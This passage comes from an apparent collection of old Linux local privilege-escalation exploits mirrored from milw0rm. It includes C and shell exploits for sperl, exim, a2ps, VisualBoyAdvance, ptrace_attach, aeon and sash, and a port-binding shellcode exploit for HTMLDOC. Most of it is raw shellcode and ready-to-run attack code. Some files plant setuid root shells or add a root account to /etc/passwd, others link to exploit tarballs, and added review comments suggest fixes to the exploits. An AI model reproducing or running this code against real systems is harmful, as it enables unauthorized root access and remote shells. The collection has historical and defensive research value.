23 | * kfinisterre@jdam:~$ su - 24 | * jdam:~# id 25 | * uid=0(root) gid=0(root) groups=0(root) 26 | * jdam:~# rm /etc/ld.so.preload 27 | * 28 | */ 29 | 30 | 31 | #define PRELOAD "/etc/ld.so.preload" 32 | #include 33 | #include 34 | 35 | /* Three steps, all run as the unprivileged caller: build a shared object whose getuid() always returns 0, get the setuid sperl to create PRELOAD as a file we can write via PERLIO_DEBUG, then overwrite PRELOAD so the dynamic loader injects that object into every dynamically linked program (su included, as the transcript above shows). NOTE(review): argc is declared int * here; the standard signature is int main(int argc, char **argv). Neither parameter is used. */ int main(int *argc, char **argv) 36 | { 37 | 38 | FILE *getuid; /* NOTE(review): /tmp/getuid.c and /tmp/getuid.so are fixed, predictable names; another local user can pre-create or symlink them before this runs, so the PoC is itself exposed to a /tmp race. A mkdtemp() directory would avoid that. */ 39 | if(!(getuid = fopen("/tmp/getuid.c","w+"))) { 40 | printf("error opening file\n"); 41 | exit(1); 42 | } 43 | 44 | fprintf(getuid, "int getuid(){return 0;}\n" ); /* the only thing the preload object does: tell every caller of getuid() that it is root */ 45 | fclose(getuid); 46 | 47 | system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc"); 48 | 49 | /* The bug being exploited: per the header, sperl honours PERLIO_DEBUG while running setuid root, so it opens the named file — here /etc/ld.so.preload — for writing as root (inferred from the header and the flow below; sperl itself is not shown). */ putenv("PERLIO_DEBUG="PRELOAD); 50 | umask(001); /* clears only the other-execute bit, so the file sperl creates presumably comes out group- and world-writable and the fopen() below succeeds for us */ 51 | system("/usr/bin/sperl5.8.4"); /* run with no script on purpose: it only has to open its debug file; the "sperl needs fd script" complaint in the transcript is expected */ 52 | FILE *ld_so_preload; 53 | 54 | char preload[] = { 55 | "/tmp/getuid.so\n" 56 | }; 57 | 58 | /* Overwrite PRELOAD with the path of our shim. From here on every dynamically linked program on the host is affected, and a stale or broken entry in PRELOAD (for example after a reboot removes /tmp/getuid.so) is what the header's boot-disk warning is about. Remove PRELOAD as soon as you are done, as the transcript does. */ if(!(ld_so_preload = fopen(PRELOAD,"w+"))) { 59 | printf("error opening file\n"); 60 | exit(1); 61 | } 62 | fwrite(preload,sizeof(preload)-1,1,ld_so_preload); /* sizeof-1 drops the terminating NUL */ 63 | fclose(ld_so_preload); 64 | } 65 | 66 | // milw0rm.com [2005-02-07] 67 | -------------------------------------------------------------------------------- /linux/linux_exploits/796.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Local Lame R00T sploit for exim <= 4.42 4 | # by Dark Eagle 5 | # 6 | # My First Coding Release In bash )) 7 | 8 | # Unl0ck Research Team 9 | # 10 | # More Effective than C-code. 
11 | # 12 | # @env.c content: 13 | # 14 | ################################################### 15 | # #include 16 | # #include 17 | # int main(int argc, char *argv[]) 18 | # { 19 | # char *addr_ptr; 20 | # addr_ptr = getenv(argv[1]); 21 | # printf("%s @ %p\n", argv[1], addr_ptr); 22 | # return 0; 23 | # } 24 | ################################################### 25 | 26 | gcc @env.c -o @env 27 | 28 | cp @env /usr/bin 29 | cd /usr/exim/bin 30 | 31 | CODE=`perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 32 | \x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`;export CODE 33 | 34 | @env CODE 35 | echo "So, dude, starting..." 36 | echo "NoW Just Type Address Of CODE" 37 | 38 | read ADDRESS 39 | 40 | echo "You are typed: $ADDRESS" 41 | 42 | echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!" 43 | 44 | ./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'` 45 | 46 | # milw0rm.com [2005-02-07] 47 | -------------------------------------------------------------------------------- /linux/linux_exploits/816.c: -------------------------------------------------------------------------------- 1 | /* Not added to Local Non Poc section /str0ke */ 2 | 3 | #include 4 | #include 5 | #include 6 | // by lizard / lizstyle[at]gmail.com 7 | // greets go to slider/trog for helpin me 8 | // not suid by default ;( 9 | #define VULNTHING "/usr/bin/a2ps" 10 | #define DEFRET 0xbffffffa - strlen(sc) - strlen(VULNTHING) 11 | #define xnullbitch 1100 12 | //i`m not a asm guru so i ripped this shellcode 13 | //shellcode by man shadow 14 | char sc[] = 15 | "\x31\xC9" /* xor ecx,ecx */ 16 | "\x31\xDB" /* xor ebx,ebx */ 17 | "\x6A\x46" /* push byte 70 */ 18 | "\x58" /* pop eax */ 19 | "\xCD\x80" /* int 80h */ 20 | "\x51" /* push ecx */ 21 | "\x68\x2F\x2F\x73\x68" /* push 0x68732F2F */ 22 | "\x68\x2F\x62\x69\x6E" /* push 0x6E69622F */ 23 | "\x89\xE3" /* mov ebx,esp */ 24 | "\x51" /* push ecx */ 25 | "\x53" /* push ebx */ 26 | "\x89\xE1" /* mov 
ecx,esp */ 27 | "\x99" /* cdq */ 28 | "\xB0\x0B" /* mov al,11 */ 29 | "\xCD\x80"; /* int 80h */ 30 | 31 | int main(void) { 32 | 33 | int ctr = 0; 34 | char buffer[xnullbitch]; 35 | fprintf(stdout, "[*] 0x%8x\n", (long) DEFRET); 36 | 37 | for(ctr = 0; ctr < xnullbitch - 1; ctr += 4) 38 | *(long *) &buffer[ctr] = (long) DEFRET; 39 | 40 | buffer[xnullbitch - 1] = '\0'; 41 | 42 | if((setenv("HOME", buffer, 1)) == -1) { 43 | perror("setenv()"); 44 | exit(1); 45 | } 46 | 47 | if((setenv("TOPX", sc, 1)) == -1) { 48 | perror("setenv()"); 49 | exit(1); 50 | } 51 | 52 | if((execl(VULNTHING, VULNTHING, NULL)) == -1) { 53 | perror("execl()"); 54 | exit(1); 55 | } 56 | return(0); 57 | } 58 | 59 | // milw0rm.com [2005-02-13] 60 | -------------------------------------------------------------------------------- /linux/linux_exploits/824.c: -------------------------------------------------------------------------------- 1 | /* 2 | VisualBoyAdvanced 1.7.x BufferOver Flow exploit 3 | VBA - WEBSITE : vba.ngemu.com 4 | Found & coded by Qnix - Qnix[at]bsdmail[dot]org 5 | */ 6 | 7 | #include 8 | 9 | char shellcode[] = 10 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid() */ 11 | "\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd" 12 | "\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80" 13 | "\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0" 14 | "\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50" 15 | "\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89" 16 | "\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" 17 | "\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; 18 | 19 | 20 | unsigned long sp(void) 21 | { __asm__("movl %esp, %eax");} 22 | 23 | int main(int argc, char *argv[]) 24 | { 25 | int i, offset; 26 | long esp, ret, *addr_ptr; 27 | char *buffer, *ptr; 28 | 29 | offset = 0; 30 | esp = sp(); 31 | ret = esp - offset; 32 | 33 | if (argc >= 2) { 34 | printf("\n ************************************************ 
\n"); 35 | printf(" VisualBoyAdvanced 1.7.x BufferOver Flow exploit \n"); 36 | printf(" by Qnix[at]bsdmail[dot]org "); 37 | printf("\n ************************************************ \n\n"); 38 | printf("[~] Stack pointer (ESP) : 0x%x\n", esp); 39 | printf("[~] Offset from ESP : 0x%x\n", offset); 40 | printf("[~] Desired Return Addr : 0x%x\n\n", ret); 41 | } else { 42 | printf("\n ************************************************ \n"); 43 | printf(" VisualBoyAdvanced 1.7.x BufferOver Flow Exploit \n"); 44 | printf(" by Qnix[at]bsdmail[dot]org "); 45 | printf("\n ************************************************ \n\n"); 46 | printf("useage : ./vba-exp \n\n"); 47 | } 48 | 49 | buffer = malloc(2300); 50 | 51 | ptr = buffer; 52 | addr_ptr = (long *) ptr; 53 | for(i=0; i < 2300; i+=4) 54 | { *(addr_ptr++) = ret; } 55 | 56 | for(i=0; i < 1900; i++) 57 | { buffer[i] = '\x90'; } 58 | 59 | ptr = buffer + 1900; 60 | for(i=0; i < strlen(shellcode); i++) 61 | { *(ptr++) = shellcode[i]; } 62 | 63 | buffer[2300-1] = 0; 64 | 65 | execl(argv[1],"VisualBoyAdvance",buffer,0); 66 | 67 | free(buffer); 68 | 69 | return 0; 70 | } 71 | 72 | // milw0rm.com [2005-09-13] 73 | -------------------------------------------------------------------------------- /linux/linux_exploits/8673.c: -------------------------------------------------------------------------------- 1 | /* 2 | ptrace_attach privilege escalation exploit by s0m3b0dy 3 | 4 | [*] tested on Gentoo 2.6.29rc1 5 | 6 | grataz: 7 | Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo... 
8 | 9 | email: s0m3b0dy1 (at) gmail.com 10 | */ 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | char shellcode[] = 28 | "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" 29 | "\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" 30 | "\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff" 31 | "echo \"#include \nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;"; 32 | struct user_regs_struct322 { 33 | unsigned long ebx, ecx, edx, esi, edi, ebp, eax; 34 | unsigned short ds, __ds, es, __es; 35 | unsigned short fs, __fs, gs, __gs; 36 | unsigned long orig_eax, eip; 37 | unsigned short cs, __cs; 38 | unsigned long eflags, esp; 39 | unsigned short ss, __ss; 40 | }; 41 | 42 | main() 43 | { 44 | struct user_regs_struct322 regs; 45 | struct stat buf; 46 | int i,o; 47 | unsigned long * src; 48 | unsigned long * dst; 49 | char *env[2]; 50 | env[0]="/usr/bin/gpasswd"; // some suid file 51 | env[1]=0; 52 | if((o=fork()) == 0) 53 | { 54 | execve(env[0],env,0); 55 | exit(0); 56 | } 57 | if(ptrace(PTRACE_ATTACH,o,0,0)==-1) 58 | { 59 | printf("\n[-] Attach\n"); 60 | exit(0); 61 | } 62 | wait((int *)0); 63 | if (ptrace(PTRACE_GETREGS, o, NULL, ®s) == -1){ 64 | printf("\n[-] read registers\n"); 65 | exit(0); 66 | } 67 | printf( "[+] EIP - 0x%08lx\n", regs.eip); 68 | dst= (unsigned long *) regs.eip; 69 | src = (unsigned long *) shellcode; 70 | for(i=0;i>/etc/passwd' > /tmp/ipseclive.conn 29 | rm /tmp/ipseclive.conn 30 | su -l t00r 31 | 32 | # milw0rm.com [2009-07-13] 33 | -------------------------------------------------------------------------------- /linux/linux_exploits/914.c: 
-------------------------------------------------------------------------------- 1 | /* first release /str0ke */ 2 | /* 3 | local linux exploit within aeon-0.2a 4 | Coded by patr0n (security-tmp.h14.ru) 5 | */ 6 | 7 | 8 | #define BUFLEN 533 9 | #define PATH "/home/research/aeon-0.2a/aeon" 10 | 11 | char shellcode[]= 12 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" 13 | "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31" 14 | "\xc0\x88\x43\x07\x89\x5b\x08\x89" 15 | "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0" 16 | "\x0b\xcd\x80\xe8\xe6\xff\xff\xff" 17 | "/bin/sh"; 18 | 19 | int main(int argc, char *argv[]) { 20 | 21 | char evilbuf[BUFLEN]; 22 | int i; 23 | char *p,*av[2], *ev[3]; 24 | char *egg; 25 | 26 | egg=(char *)malloc(1000); 27 | sprintf(egg, "EGG="); 28 | memset(egg + 4, 0x90, 1000-1-strlen(shellcode)); 29 | sprintf(egg + 4 + 1000-1-strlen(shellcode), "%s", shellcode); 30 | 31 | long ret=0xbfffffff-5-strlen(egg)-strlen(PATH); 32 | 33 | p=evilbuf; 34 | bzero(evilbuf,sizeof(evilbuf)); 35 | strcpy(evilbuf,"HOME="); 36 | 37 | for(i=5;i<=BUFLEN;i+=4) 38 | *(long *)(p+i)=ret; 39 | 40 | av[0] = PATH; 41 | av[1] = 0; 42 | ev[0] = egg; 43 | ev[1] = evilbuf; 44 | ev[2] = 0; 45 | execve(*av, av, ev); 46 | 47 | return 0; 48 | 49 | } 50 | 51 | // milw0rm.com [2005-04-05] 52 | -------------------------------------------------------------------------------- /linux/linux_exploits/9208.txt: -------------------------------------------------------------------------------- 1 | PulseAudio setuid Local Privilege Escalation Vulnerability 2 | http://www.securityfocus.com/bid/35721 3 | Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and 4 | Yorick Koster 5 | -- 6 | 7 | Put files in /tmp/pulseaudio-exp (or change config.h). Must be on 8 | same fs as the pulseaudio binary. 9 | 10 | Goes faster if you already have a pulseaudio running ? 
:p 11 | 12 | Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0 13 | (x86) 14 | 15 | Ubuntu: 16 | ------------------------------------ 17 | $ ./c.sh 18 | $ ./pulseaudio-exp 19 | Please wait. 20 | [*] Seems we are uid = 0 and gid = 0 21 | [*] mv /tmp/pulseaudio-exp/shell /sbin/axx 22 | [*] chown root.root /sbin/axx 23 | [*] chmod 4755 /sbin/axx 24 | Try: /sbin/axx /bin/sh 25 | $ /sbin/axx /bin/sh 26 | # id 27 | uid=0(root) gid=0(root) 28 | groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(adm 29 | in),122(sambashare) 30 | # uname -a 31 | Linux ubuntu 2.6.28-13-generic #45-Ubuntu SMP Tue Jun 30 22:12:12 32 | UTC 2009 x86_64 GNU/Linux 33 | ------------------------------------ 34 | Slackware 35 | ------------------------------------ 36 | $ ./c.sh 37 | $ ./pulseaudio-exp 38 | Please wait. 39 | [*] Seems we are uid = 0 and gid = 0 40 | [*] mv /tmp/pulseaudio-exp/shell /sbin/axx 41 | [*] chown root.root /sbin/axx 42 | [*] chmod 4755 /sbin/axx 43 | Try: /sbin/axx /bin/sh 44 | $ /sbin/axx /bin/sh 45 | sh-3.1# id 46 | uid=0(root) gid=0(root) groups=17(audio),100(users),104(pulse-rt) 47 | sh-3.1# uname -a 48 | Linux slackware 2.6.27.7-smp #2 SMP Thu Nov 20 22:32:43 CST 2008 49 | i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz 50 | GenuineIntel GNU/Linux 51 | ------------------------------------ 52 | 53 | download: http://exploit-db.com/sploits/2009-pulseaudio-exp.tar.gz 54 | 55 | # milw0rm.com [2009-07-20] 56 | -------------------------------------------------------------------------------- /linux/linux_exploits/924.c: -------------------------------------------------------------------------------- 1 | /* sash-3.7 buffer overflow in c argyment 2 | written by lammat for practice purposes 3 | http://grpower.ath.cx 4 | lammat@iname.com 5 | 6 | (gdb) r -c `perl -e 'print "A"x10256'` 7 | The program being debugged has been started already. 8 | Start it from the beginning? 
(y or n) y 9 | Starting program: /sbin/sash -c `perl -e 'print "A"x10256'` 10 | warning: shared library handler failed to enable breakpoint 11 | 12 | Program received signal SIGSEGV, Segmentation fault. 13 | 0x41414141 in ?? () 14 | 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | static char shellcode[]= 22 | "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68" 23 | "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; 24 | 25 | 26 | #define NOP 0x90 27 | #define LEN 10256 28 | #define RET 0xbfff7770 29 | 30 | /* RET is a fixed guess at where buffer lands on the author's stack; on any other box, or with stack randomisation, it has to be re-found with gdb as in the transcript above. */ int main() 31 | { 32 | char buffer[LEN]; 33 | long retaddr = RET; 34 | int i; 35 | 36 | fprintf(stderr,"using address 0x%lx\n",retaddr); 37 | 38 | /* Filling the buffer... */ 39 | 40 | for (i=0;i Linux NULL pointer dereference due to incorrect proto_ops initializations 2 | > > ------------------------------------------------------------------------- 3 | 4 | Quick and dirty exploit for this one: 5 | 6 | http://www.frasunek.com/proto_ops.tgz 7 | back: http://www.exploit-db.com/sploits/2009-proto_ops.tgz 8 | 9 | # milw0rm.com [2009-08-14] 10 | -------------------------------------------------------------------------------- /linux/linux_exploits/9436b.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | /* Launcher for the proto_ops NULL-dereference exploit referenced in 9436.txt: change this process's execution domain, then exec the real exploit so it inherits the setting. */ int main(void) { 6 | /* On Linux, PER_SVR4 is the SVR4 domain plus the MMAP_PAGE_ZERO flag, and personality flags are kept across a non-setuid execve(); presumably ./exploit relies on this to mmap() address 0 so the kernel's NULL function-pointer call lands on attacker-controlled code. TODO confirm against the tarball, which is not shown here. */ if (personality(PER_SVR4) < 0) { 7 | perror("personality"); 8 | return -1; 9 | } 10 | 11 | fprintf(stderr, "padlina z lublina!\n"); 12 | 13 | execl("./exploit", "exploit", 0); /* NOTE(review): execl() returns only on failure and the failure is not reported — a missing ./exploit silently falls off the end of main. Add perror("execl"); return -1; after this call. Also, a bare 0 as the argument terminator is not portable where int and char * differ in size; use (char *)0. */ 14 | } 15 | 16 | 17 | -------------------------------------------------------------------------------- /linux/linux_exploits/9477.txt: -------------------------------------------------------------------------------- 1 | Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. 
2 | 3 | orig: http://zenthought.org/content/file/android-root-2009-08-16-source 4 | back: http://www.exploit-db.com/sploits/android-root-20090816.tar.gz 5 | 6 | # milw0rm.com [2009-08-18] 7 | -------------------------------------------------------------------------------- /linux/linux_exploits/9545: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/9545 -------------------------------------------------------------------------------- /linux/linux_exploits/9574.txt: -------------------------------------------------------------------------------- 1 | /* second verse, same as the first 2 | CVE-2009-2698 udp_sendmsg(), x86/x64 3 | Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at 4 | NULL and finding it executed 5 | This exploit is a bit more nuanced and thoughtful ;) 6 | use ./therebel.sh for everything 7 | 8 | At this moment, when each of us must fit an arrow to his bow and 9 | enter the lists anew, to reconquer, within history and in spite of it, 10 | that which he owns already, the thin yield of his fields, the brief 11 | love of the earth, at this moment when at last a man is born, it is 12 | time to forsake our age and its adolescent furies. The bow bends; 13 | the wood complains. At the moment of supreme tension, there will 14 | leap into flight an unswerving arrow, a shaft that is inflexible and 15 | free. 
-Camus 16 | */ 17 | 18 | main: http://grsecurity.net/~spender/therebel.tgz 19 | back: http://exploit-db.com/sploits/2009-therebel.tgz 20 | 21 | # milw0rm.com [2009-09-02] 22 | -------------------------------------------------------------------------------- /linux/linux_exploits/9595.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux) 4 | Reference: http://www.securityfocus.com/bid/35727 5 | 6 | Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR) 7 | Credit: ANTHRAX666 for finding the vulnerability 8 | 9 | Coded by Pankaj Kohli 10 | http://www.pank4j.com 11 | 12 | pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space 13 | 2 14 | pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f 15 | pankaj@zion:~/test/htmldoc$ ./htmldocb0f 16 | 17 | [*] Creating buffer 18 | [*] Exploit file written to sploit.html 19 | Run as: htmldoc -f somefile.pdf sploit.html 20 | 21 | pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444 22 | pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html & 23 | [1] 3287 24 | pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444 25 | tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 26 | 27 | */ 28 | 29 | #include 30 | #include 31 | 32 | 33 | /* Port binding (xor encoded) shellcode (port 4444) */ 34 | char code[] = 35 | "\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34" 36 | "\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05" 37 | "\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f" 38 | "\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff" 39 | "\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f" 40 | "\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f" 41 | "\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e" 42 | "\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff" 43 | "\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c" 44 | "\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21" 45 | "\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d" 46 | "\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78" 47 | 
"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff" 48 | "\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5" 49 | "\xd3\x9e"; 50 | 51 | long jmp = 0x0804d938; // push esp; ret 0x0807; ;-) 52 | 53 | int main(int argc, char **argv, char **envp) { 54 | char buff[512]; 55 | int i; 56 | FILE *fd; 57 | 58 | printf("\n[*] Creating buffer\n"); 59 | strcpy(buff, "